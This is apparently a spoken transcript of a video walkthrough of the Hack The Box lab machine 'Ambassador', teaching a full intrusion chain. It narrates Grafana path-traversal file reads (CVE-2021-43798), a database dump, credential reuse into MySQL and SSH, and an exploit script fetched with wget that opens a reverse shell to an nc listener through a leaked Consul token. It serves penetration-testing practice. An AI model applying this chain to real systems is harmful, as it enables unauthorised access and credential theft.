Well, hello everyone, welcome back guys. Hope you all are doing well. This is Mohammad Badrudduja and today we are going to solve another machine from Hackthebox. The machine name is Ambassador and the difficulty level is of this machine is medium. So without wasting time, let's go and we start the reconnaissance, actually active reconnaissance from the nmap. So as we always do, nmap space hyphen s capital C space hyphen s capital V for version enumeration, and the target IP is going to be 10.10.11183, and I want to save the scan results in a file named as default.nmap. I already ran the scan to save the time, so I will show you the scan result. Here if we see this scan result, we can see there are a bunch of ports open. The first port is port number 22, which is TCP port, and this port state is open and the service running on it is SSH. So by default port number 22 is for SSH and the version here is OpenSSH 8.2 p1. Port number 80, again TCP port, state is open and it's using HTTP service, and the server running is Apache HTTPD 2.4.41. And here as you can see the HTTP title, so you will see Ambassador Development Server, which we can see here, Ambassador Development Server. Okay, generator is Hugo 0.94.2. The third port is port number 3000. That is interesting, but we right now do not know what this port is all about. But what we can see here, this is some kind of HTTP banner. Cache control, no cache, content type, expiry -1, location is /login. So that seems like there is a login page, and this is a HTTP service. I think some kind of application is running over it or published on this port, and as you can see the reference is /login again. It is found, so we will see that in a minute and we will see what exactly running on this port. The last port is port number 3306, and I think you are pretty familiar with this port. This is for MySQL, and as you can see here port is open, service is MySQL and it's MySQL 8.0.30. This is actually very bad. MySQL info protocol 10. Okay, fine. So that was it. Let's go and we will explore more. So the first thing, we already open up here and accessing port number 80. So this is an application or a website. And in the recent post you can see here, welcome to the Ambassador Development Server, and let's go read more. And once we go to read more, here we can see, hi there, this server exists to provide developers at Ambassador with a standalone development environment. When you start as a developer at Ambassador, you will be assigned a development server of your own to use. And how you can connect to that machine, it's saying here, use the developer account to SSH and DevOps will give you the password. So that means developer is going to be a genuine user with which we can access the SSH, access the server via SSH using SSH. And the password for the developer will be provided by the DevOps. Fine. So this is the thing, and on this page actually there is nothing interesting and there is nothing more. When I did that machine, I also tried subdomain enumeration, directory busting, many things, but the thing is here you will not find anything else, just this important information which you can keep it with you. So I come here and keep this with me, and here I can specify what are the ports open. So we found these ports open. Fine. Okay. So let's go and we try to access another port, which is 10.10.11.183 on port number 3000. Before accessing that and before coming on to this, I just want to mention one thing. As we know that developer is going to be the genuine user to access the target with SSH. So I also tried to brute force the developer user password with Hydra. You can also try brute forcing the password for the developer, but the thing is that's not gonna work. And this is also not a good practice to brute force without understanding the infrastructure and what's running in the infrastructure. Maybe there are some fail to ban, or there is any kind of a control running in the backend which is detecting the traffic coming on the SSH. So maybe your IP is going to be blocked and you have to wait for a long time. So, but this is Hackthebox machine and we are here to practice things and to apply the techniques. So you can go for it. Fine. Back to the port number 3000, and here we can see that there is a login page as we saw in the nmap scan, and the application running here is Grafana. The most important part here is the version. We can see version 8.2.0. So by seeing this, I totally agree to go with search exploit. So search exploit Grafana, hit enter, and there is something, because the version running on the application is 8.2.0. so this could be valid because the version is superior than 8.2.0. so this vulnerability may exist, and the vulnerability here is directory traversal and arbitrary file read. So I would like to search exploit space -m and just copy this and paste it here, hit enter to save this file. So now if we come back here, there is a file. This is the exploit, and the exploit is CVE 2021 43,798. So the first thing here, they use plugins. Okay. And from the session, it's taking the headers, and there is a file to read. So whatever file you are going to read, you must put that file as input. So it will ask you to put the file you want to read. Then it is going to arc.host, whatever host you will specify, it will put that. Then /public/plugins, and the plugins already mentioned here, the list of plugins. Then what it's going to do, it's going to choose plugin, and then this is the traversal path, and whatever file you want to read, you can specify here in the input, and it will take that file. Then the URL will be completed, and it is going to make a request to that URL. Fine. Verify false. If the URL contains HTTPS, so it will not verify the SSL. And if the plugins not found, so it will give you plugins not found. And if you get the 200 status code, it is going to print the response of the request. Fine. Okay. And as you can see here, description is Grafana version 8.0.0 beta to 8.3.0. So any version in between this is vulnerable to directory traversal. Now here they mentioned the arguments we need to use. So space -h for the host or destination. Okay, just one switch is there. So let's go and try that. So the first thing first, Python 3, that should be the thing, 3000. let's say etc/host file not found /etc/host. Now that works. Here you can see now we can read etc host file. So similarly, let's try to read /etc/passwd password file, and we can see we get the password file. So I think it's better to keep it somewhere. Later we may need that. Okay, back again, and now let's try to read some files regarding the application Grafana application. But the thing is, we don't know where exactly the file exists for Grafana, and maybe this is the first time you are dealing with Grafana. So I just want to make you feel as similar to the real testing. So what we do, because a lot of time that is going to be our first time once we engage with some application, and before we never ever engage with that kind of application. So what is going to be your methodology? So in my perspective, I will go to Google as always, and maybe GitHub, because Grafana we saw that open source is also available. So Grafana GitHub, okay, and go to Grafana. Okay, installation guide. Let's go to installation guide. There is also document/doc, and it is also inside the doc directory, you can see here. So the thing is, we should go to the documentation of that particular application to see if we can get and if we can understand the directory structure of this application whenever you are going to build that application. So that was my purpose. Okay, so let's see. Installing Grafana. Install on Debian or Ubuntu. Okay. These are the package details, and as you can see in the package details, you will find here installation installs binary goes to this directory. Okay, install init.d script going into this directory. Create the default environment file in this directory or in this path, and install configuration file to etc grafana.ini. Okay, this is important. We are going to read this file because this is the configuration file, and in applications configuration files are very, very important, because a lot of time you will find the sensitive information, even credentials in clear text. So we are going to read this file. The second is, this is the service. This is for log. All the logs will go to this path in this file. And there is SQLite database, and the path of this database is this. So I'm going to take these two because these two are very important. Come here, paste that, and come back here, copy and paste it here, right? So let's go. First of all, what we need to slash, what was the file name, /etc grafana ini grafana.ini. So put it here, hit enter, and as you can see, we found here this file. So to better analyze this file, what I will do, I will actually copy this because we may need later also. and it is a very big file. So copy, come back here, close that, open new, paste it, and let's see. Whenever I see something important, I will zoom. So there are different sections like paths, okay, logs, plugins, whatever, database. So here is database configuration. So the database could be MySQL, Postgres, or SQLite 3. They use SQLite 3 on port number 3306, and the name of the database is Grafana. The username is root, but the password is not here. Okay. Data source, cache, analytics, security. This is important. So I will zoom a bit. We are seeing this part. This part, right? So username is admin, and admin password is this. Fine. And there is a secret key. So what I'm going to do, I'm going to take up to the secret key, Control C, come back here in the notes and paste it here. Remove this line. We don't need that. Remove this and remove this. Right? So we have admin user and admin user password. Okay, go back to the application Grafana. Here, let's try to log in with that credential. So this is the username and this is going to be the password. Paste that here, log in. Don't save. Fine, and we are logged in. So that's perfect. Okay, if we come here in the security, go to the settings. So in the settings, you are going to see the same, like what are the paths and the directories are there to save the database files and other important information. You will see there, and also you will see the secret keys and password, but all those are encrypted or not in the clear text. So that's the problem. But the thing is, up to now, we did not find the developer user password. Right. Or maybe we find the database password. But the thing is, inside grafana.ini file, there is database configuration section, but the password was not mentioned there. So let's go there. That's what I wanted to show you. Fine. The data path, logs path, plugins, provisioning, all these. Okay. So the application we find, but the thing is we need to access the target by developer user, and we don't have the password. The second probability here is to get the credentials for the database. So we also did not get any database password. Now the thing is we can dump the database file, the whole database file, grafana.db. So let's go and we will try to extract this file, or maybe we try to read this file. Paste that. Let's see if we can read it. Yeah, we can read it, and all the tables and queries are here. But the problem here is, even if in the database there is clear text password, you are not going to see it here. So for that purpose, we must need to save or dump this database, right? Okay, so let's try, because what we see here, this is a POC and it's working absolutely perfect. But the thing is, here we don't have, either we can write here something to make the output and save the output as a file, or we can search a bit more well written exploit. So GitHub CVE 2021, and it's 43,798, I think. What was that? Um, 43,798, yeah. POC. Come on. Okay. This is the path traverser. Let's open this one. Open this one. Let's see. So here is the exploit. We need to see what are the switches here. So dumping SQLite database. What we need to do, and this exploit is written in Go language, so we need to run it with the Go. We need to specify the target, dump database, and output. Yeah, this is what we need. Whatever we can read, we can also dump or save it as a file. So that's what we need. I'm going to just take it, copy, come back here, git clone, and paste that, hit enter. Okay, cd cve ls space -la. So exploit.go is here. Clear that, and go run exploit.go space -target. Target, and target is going to be http://:3000, right? Space -dump database, and space -output, and output file like grafana.db. Hit enter. Let's see, it's working fine. Dump database, output grafana.db. Yeah, so it's already ran, and as you can see, information is there. Successfully saved output file to grafana.db. I'm going to clear it, and ls space -la. So it is going to save the file inside this directory, its own directory, grafana.db. Now we just need to open SQLite browser, and we need to open this grafana.db. So open database, desktop, ambassador, here grafana.db, right? A lot of tables are there. For me, let's see, user auth. So browse data, in the file, in the table, let's say user auth, there is nothing. Users, admin, and we already have the admin password, so we don't need that. Okay, let's try something else. Temporary user, there is nothing. Sessions, maybe we get session. No. Yeah, session doesn't make sense here because we need the hard-coded credential for the developer user, or maybe the database user. So database user, if we see, because inside users we did not get the developer user. So the second purpose is to get the password for the database. And we can get it from the data store. So as you can see, there is data store table. Inside that table, there is mysql.yml proxy, and the username is Grafana. This is the username is Grafana, database name is Grafana, and the password is this, and this is clear text password. So I'm going to copy that from here back to the notes, and here we can say db underscore name is going to be Grafana, username Grafana, password is this, right? And we already know the port number and the host name. So let's go and try to access database now. Clear that. MySQL space -h 10.10.11183 space hyphen capital P for the port number, so 3306, space hyphen small u for the username, so username was Grafana, and space hyphen P. It will ask the password, paste the password, hit enter, hope for the best. And we are in. So show databases. I actually forgot to specify here space hyphen capital D switch to specify the database. So there is Grafana database. Use Grafana semicolon. Come on, I write wrong. Grafana database changed, and now we are inside Grafana. So show tables, and this database is empty. So information schema is default. It could be sys or this Voki widget. Let's see this widget one. So I'm going to copy that. Use database this. Yeah, we switched the database. Now let's try to see the tables. Show tables, and there is only one table, which is users. So describe users, and there are only two fields, username and password. So select star from users, and we got the developer user here, and this is the password, and most probably it is like base 64. So I'm going to copy this and come back to our notes and paste it here. Okay, now let's try to decode it. So copy it, come back here, exit, clear, and echo space hyphen n, paste that, base 64 space hyphen d to decode. An Englishman in New York, and this is the number. So this is the password. Copy this back to the notes and paste it here. Fine. So now we have the credentials for developer user. Let's go and try to access SSH. Clear that, SSH space developer at target IP. Paste the password, and we logged in. So clear it, ls space hyphen la, and we have the user flag here. So cat users.text, and this is your user flag, right? Now let's see, there is .ssh2. Okay, and we will try to now escalate our privileges. So grep, first of all, let's see how many users are there. Those can run bash /etc/passwd. Okay, only root is left. The second thing I would like to do is to see id command. This is important. These little commands are important because sometimes user is in another group, and that group have some other privileges and permissions to do the privileged task. So that is very important, but here there is nothing. Cat /etc/ cron tab, and there is no cron job. Cron tab space -l, no cron job for developer. Sudo space -l, paste the password, copy, come back here, paste it, and there is nothing in the sudo. So developer user have nothing to run with the sudo. Another thing I would like to see if developer can execute any binary having SUID bit set. So find / space -permission space -u equal to s to dev / null. These seems normal. Okay, let's try the processes ps space aux. Nothing interesting here. Okay, let's try to see how many ports are open. Net state space -tlpn. So bunch of ports published locally, like 8600, 33060, 8300, 8301, 8302, and 8500. So I would like to keep this part with me. Copy that, come back to the notes and paste that here. Okay. Clear. Let's say cd/var/www ls space -la. There is HTML and backups. cd backups ls space -la. There is nothing. cd, let's see, /opt directory. There are actually two directories. One is my app and another one is console. Okay, let's see what's inside my app. This is the same database what we saw before. Cd my app, ls space -la, manage.py, put config in console.sh, and that is the owner of this file is root, but we have read and execution permission. What is console? Yeah, we can execute console. Okay. Console version help command arguments. We will see that in a minute. What is console? Manage.py is, this is also the owner of it is root. Let's see, clear. There is one more directory here, git. And first of all, I would like to see cat paste console. What was that? Put config in console.sh. So there is a command running which is console kv put and the directory, okay, and inside the database mysql underscore password, and here I think they mention what it is. So we use console for application configuration in production. Okay, this script will help set the correct values for the app, export mysql password and console http token before running. Fine. And let's see what is inside. What was the file name? It was manage.py, right? What is inside manage.py? Environment, Django's command line utility and administrative task. So basically this file is used for the production configuration, and before running the application it is going to export the password of the MySQL and the token, right? And there is manage.py file which is for the Django command utility administrative task, and using it to install the Django. Fine. So the second thing here is, if we see closely, there is .git directory also, and there is env. So what is inside env? Binary file, library files, and there is Python environment configuration. There is git. I would like to see the git logs, because what we found here inside, I would like to keep that with me actually. Copy, come back here, paste it. Okay, and now let's see git logs log. Okay, so there are 4 logs. This is the first one. So let's see the difference, if we find any difference in the logs. So git diff and paste this log, and there is no difference in it. Let's try to check this one. This is the tidy configuration script, and this is the configuration script. So git diff paste and hit enter. There is change, and the change is what? The change is here. So what you see in the red has been deleted, and what you see in the green is added, right? And you can also see, you can also differentiate it by this sign. Whatever you see in minus is deleted, and whatever you see in plus is added. So this is the difference in this commit. Before they just export the MySQL password before running the application. Now what they did, they export the MySQL password and also the console HTTP token before running that. So now if you see closely what they said before, they are just exporting the MySQL password, not the token. So the first command for console, before they already added the token here, right? And they exporting what? They exporting only the MySQL password. Now they are exporting the MySQL password and console token too. So in the newly configured command, there is no token, but here you find the token. Now the thing is how you can abuse this token, or how you can use this token to escalate your privilege. This is the part, and we don't need that, so I'm going to close it. Let's go to Google, and we will ask to Google. And first of all, I think, because there is a thing, there are two things. First of all, these ports, okay, especially this 8600 and 8500. These two ports are important. And the second thing is that console. So console exploit privilege escalation or RCE. Just wait a moment. We can actually execute console command, right? Let's say version. Yeah, and there is the console version, which is 1.13.2. So in that way, we can get the more specific result. 1.13.2, there is one exploit. It's saying console vulnerable to authorization bypass. Okay. Remote code execution via service, but this one is Metasploit module. There is one. Console exploit.py. Here what we need to mention is URL and port and IP. Create a new check in console agent to obtain a reverse shell. So we had this one. Potential privilege escalation. Let's see this one. So this we already see. Let's see a few more. So this one is 1.4.3. But the important thing here, you can see it is hosted on port 8500. Okay, you can read that. And here is another exploit. So this exploit helps you to get a reverse shell exploiting HashiCorp console service via API, not using tool like Metasploit. Yeah. This seems more promising. Here you can specify the remote host, remote port, local host, local port, and the token. Fine. So token, we already have it. And this is the way you can execute the command. So let's see. We will try this one. Copy that and come back here. Cd ... clear it and git clone, paste that here. Okay, now back HashiCorp exploit.py. Okay, and what we see here, because the service is hosted locally, so we cannot run it from our machine. What we can do, we need to send this exploit file to the target. So cd HashiCorp console ls, there is exploit.py. I'm going to start my Python HTTP server on port 80. Come back here, clear that, and cd/temp wget http:// my IP is 10.10.14.10. Here it's also mentioned, but I don't know you can see it or not. So just try to show you that. ifconfig tunnel 0 10.10.14.10. Okay, /exploit.py. Okay, it's done. Clear that. And now let's execute it. Python 3 exploit.py, running with Python 3. That's okay. and these are the switches we need to use. I think it's better to see both in the same terminal. NC space hyphen NLVP 4545, hit enter. Now let's execute this. Python 3 exploit.py space hyphen hyphen rhost. So rhost is going to be this is going to be the remote host, which is local host. Okay, space hyphen r port, and it is published on 8500. Okay, space hyphen l host, sorry, it should be ll host, and that's gonna be my IP 14.10, and space hyphen l port, that is going to be the port on which I am listening, and space hyphen token. So the token, we already have it here. Oh, come on. No. Okay, I'm going to copy this command. I forgot to copy the token. That's the major mistake. So just paste that command here and clear that. What was that? So let's do this. cd /opt/ my app git log git diff and the second one, right, this one, copy, come back here, paste it. So this was the token. Control Shift C, back to the nodes, and this is the token. Actually, I should copy this whole line. Okay, now back again here, cd /temp, clear it, and we already have this command what we write before, is that here, and we just need the token value, which is this. Copy and paste it here and just hit enter. So request sent successfully. Check your listener. Here is our listener, and we get the reverse shell. Fantastic. So who am I? ID, hostname. Now what we need to do here is cd /root. Okay, we can clear it. No. Okay, ls space hyphen la, and there is root.txt. So export term is equal to xterm. Now we can execute clear command and cat root.txt, and this is our root flag. So we compromise the whole machine up to the root, and we are the whole sole authority of this target machine. So that's it for this video. If you like the content, please like, subscribe and share, and I will see you in the next video. Bye.